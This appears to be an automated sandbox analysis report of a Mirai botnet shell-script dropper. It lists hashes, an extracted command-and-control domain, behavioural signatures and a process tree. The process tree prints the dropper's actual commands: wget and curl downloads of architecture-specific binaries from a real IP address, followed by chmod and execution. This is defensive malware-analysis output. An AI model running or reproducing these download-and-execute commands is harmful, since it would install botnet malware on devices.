Analysis
-
max time kernel
135s -
max time network
145s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-11-2024 03:59
Static task
static1
Behavioral task
behavioral1
Sample
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
-
Size
2KB
-
MD5
e4e77af4bac19bf01d29278bd0e9e586
-
SHA1
c196bf5f34ff7ea2153847184efb61e1660a156b
-
SHA256
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b
-
SHA512
84b295fee8cd431551221eaf5bb3148d58c5e58fce7a824bd30b0f6debff6cb10443518167a61eb4e06ee3802b0c476a8c464c8481f38fa4cd1208566adbb10e
Malware Config
Extracted
mirai
UNSTABLE
server.myway-ing.win
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
server.myway-ing.win
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 826 chmod 832 chmod 838 chmod 849 chmod 735 chmod 747 chmod 801 chmod 720 chmod 765 chmod 843 chmod 690 chmod 702 chmod 708 chmod -
Deletes itself 2 IoCs
Processes:
WTHWTHpid process 721 WTH 766 WTH -
Executes dropped EXE 13 IoCs
Processes:
WTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHioc pid process /tmp/WTH 692 WTH /tmp/WTH 703 WTH /tmp/WTH 709 WTH /tmp/WTH 721 WTH /tmp/WTH 736 WTH /tmp/WTH 750 WTH /tmp/WTH 766 WTH /tmp/WTH 802 WTH /tmp/WTH 827 WTH /tmp/WTH 833 WTH /tmp/WTH 839 WTH /tmp/WTH 844 WTH /tmp/WTH 850 WTH -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
WTHWTHdescription ioc process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
Processes:
WTHdescription ioc process File opened for reading /proc/net/tcp WTH -
Writes file to system bin folder 4 IoCs
Processes:
WTHWTHdescription ioc process File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH -
Changes its process name 2 IoCs
Processes:
WTHWTHdescription ioc pid process Changes the process name, possibly in an attempt to hide itself 7qbw5eit71nohbt2 721 WTH Changes the process name, possibly in an attempt to hide itself h3etodrotfm27ein 766 WTH -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
WTHdescription ioc process File opened for reading /proc/net/tcp WTH -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlcatWTHpid process 694 wget 699 curl 701 cat 703 WTH -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlcurlwgetwgetcurlcurlwgetwgetcurlca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.shwgetwgetwgetcurlcurlcurlcurlcurlcurlwgetwgetcurlwgetcurldescription ioc process File opened for modification /tmp/zmap.sh4 wget File opened for modification /tmp/zmap.sh4 curl File opened for modification /tmp/zmap.x86 curl File opened for modification /tmp/zmap.mpsl wget File opened for modification /tmp/zmap.m68k wget File opened for modification /tmp/zmap.m68k curl File opened for modification /tmp/zmap.arm6 curl File opened for modification /tmp/zmap.ppc wget File opened for modification /tmp/zmap.spc wget File opened for modification /tmp/zmap.spc curl File opened for modification /tmp/WTH ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh File opened for modification /tmp/zmap.mips wget File opened for modification /tmp/zmap.arm wget File opened for modification /tmp/zmap.arm6 wget File opened for modification /tmp/zmap.arm7 curl File opened for modification /tmp/zmap.ppc curl File opened for modification /tmp/zmap.arc curl File opened for modification /tmp/zmap.mips curl File opened for modification /tmp/zmap.mpsl curl File opened for modification /tmp/zmap.arm curl File opened for modification /tmp/zmap.arm5 wget File opened for modification /tmp/zmap.x86 wget File opened for modification /tmp/zmap.arm5 curl File opened for modification /tmp/zmap.arm7 wget File opened for modification /tmp/zmap.i686 curl
Processes
-
/tmp/ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh/tmp/ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh1⤵
- Writes file to tmp directory
PID:664 -
/usr/bin/wgetwget http://154.216.16.38/zmap.x862⤵
- Writes file to tmp directory
PID:666
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680
-
-
/bin/catcat zmap.x862⤵PID:689
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-CuimCH WTH zmap.x862⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/WTH./WTH ssh.x862⤵
- Executes dropped EXE
PID:692
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:694
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:699
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
PID:701
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-CuimCH WTH zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/WTH./WTH ssh.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:703
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.mpsl2⤵
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:706
-
-
/bin/catcat zmap.mpsl2⤵PID:707
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-CuimCH WTH zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:708
-
-
/tmp/WTH./WTH ssh.mpsl2⤵
- Executes dropped EXE
PID:709
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arm2⤵
- Writes file to tmp directory
PID:711
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:714
-
-
/bin/catcat zmap.arm2⤵PID:719
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-CuimCH WTH zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/WTH./WTH ssh.arm2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:721
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arm52⤵
- Writes file to tmp directory
PID:723
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/catcat zmap.arm52⤵PID:733
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-CuimCH WTH zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/WTH./WTH ssh.arm52⤵
- Executes dropped EXE
PID:736
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arm62⤵
- Writes file to tmp directory
PID:737
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/catcat zmap.arm62⤵PID:745
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-CuimCH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/WTH./WTH ssh.arm62⤵
- Executes dropped EXE
PID:750
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arm72⤵
- Writes file to tmp directory
PID:751
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/catcat zmap.arm72⤵PID:764
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-CuimCH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/WTH./WTH ssh.arm72⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:766
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.ppc2⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/catcat zmap.ppc2⤵PID:799
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-CuimCH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/WTH./WTH ssh.ppc2⤵
- Executes dropped EXE
PID:802
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.m68k2⤵
- Writes file to tmp directory
PID:804
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/catcat zmap.m68k2⤵PID:825
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/WTH./WTH ssh.m68k2⤵
- Executes dropped EXE
PID:827
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.spc2⤵
- Writes file to tmp directory
PID:829
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/catcat zmap.spc2⤵PID:831
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/WTH./WTH ssh.spc2⤵
- Executes dropped EXE
PID:833
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.i6862⤵PID:835
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/catcat zmap.i6862⤵PID:837
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/WTH./WTH ssh.i6862⤵
- Executes dropped EXE
PID:839
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.sh42⤵
- Writes file to tmp directory
PID:840
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/catcat zmap.sh42⤵PID:842
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/WTH./WTH ssh.sh42⤵
- Executes dropped EXE
PID:844
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arc2⤵PID:846
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/catcat zmap.arc2⤵PID:848
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/WTH./WTH ssh.arc2⤵
- Executes dropped EXE
PID:850
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD5192b6eb8dcf1ad172064c832fbb47b92
SHA1a2af8812f96d0748f3a119a4419ff65dcffb179c
SHA256a97f5317845c7053e64d0d8d5e076532de7a2c98189eb7304b8e0e742e61e93d
SHA5127ad2efc28832cf1312c00bccf6866669938b0f4787999b7112f750377aa5582b8c508bedba29f482dadceb6a1c3868ce87220cdded44399a1cd325ab9bfd7e9a
-
Filesize
94KB
MD5b4458e4fa2efcf88bfa2aaeda864519e
SHA18263798736379ed4ce23ef75e4d1f606e05c815b
SHA256146ef07d918f77546ba8112e9f307361f9d54af4886dba7fc4ba9e58bc8c5d47
SHA5124aa6068f6e3ed09c6706c37f046cd4081a5c7de3e307860e67ff9fff426a281f33dbb027bbcb36b0fd9df6dccd083308d78f43948009ccdcc3676ed4ff063010
-
Filesize
74KB
MD58a666a51d2aeb8e106c7c9a302aa3acb
SHA1c222cd4760966db8f2461c4dc034f9f3fe912eb2
SHA2567b6c76af31adf965e62b5c726ea382825eb5f2aefc7e7331b192e0d4c809fe46
SHA512b48dd376f4e801bd6ea3351a1726a45d1b895f25f534d9d211b1023195881211f3b52f02914317899f122d71b88775e912f6092e5fe7d83565b3fd23012a04ac
-
Filesize
49KB
MD5803219db4e5384144e86c388e558a530
SHA1c8cb8ec327c2a53a6a5fa42d8c2886161defff89
SHA2560edc353b0bc96801a0a2d654427c9f51991f3500a3a43070d9c5828efadd352e
SHA512ccc7ee4ea8f672dd7d8df15e809b6cd9250ec80c0edbd929f0f8ab794c07bcf6ca7aade1f47898348b999f729b1ed6b47d4abed73eb8d2c94eac023fd5cf6332
-
Filesize
152KB
MD504bd1585a8ca785193b158d27307e80b
SHA120faf0e3c7f878f134142f71c9f5b7d58ce5ab17
SHA256272f6e7e0d6dd601ef8110959bc6907cf4531a87fc3e6a5b3ab7d32d1fa3d2ee
SHA512d92b33a37dbd627faaf48ed65f785191ea8fccb104e15801d64160885e6244a7a98bc17ae1a5eb9e0c9d7f4b5f807174c2aff30d7235be4e8a19b271cd1fc2f2
-
Filesize
61KB
MD58edb75406d233f4201e85fd2d746c114
SHA179272fc7bf16c8f354efa0b4b59bcdf0f929fa0a
SHA256e1f60f41d27140942ad74ef1f1bae26fc98787fed03c91d3c4a33e5390b6d3be
SHA512df424a671363b4a9d6480a3210e9b135dfbce80bb9e8af7f2b931c5ba51deb8256d54b505dd418091f03c4139ccec955cc00cfeb1456e791c37d7abb5a1253c5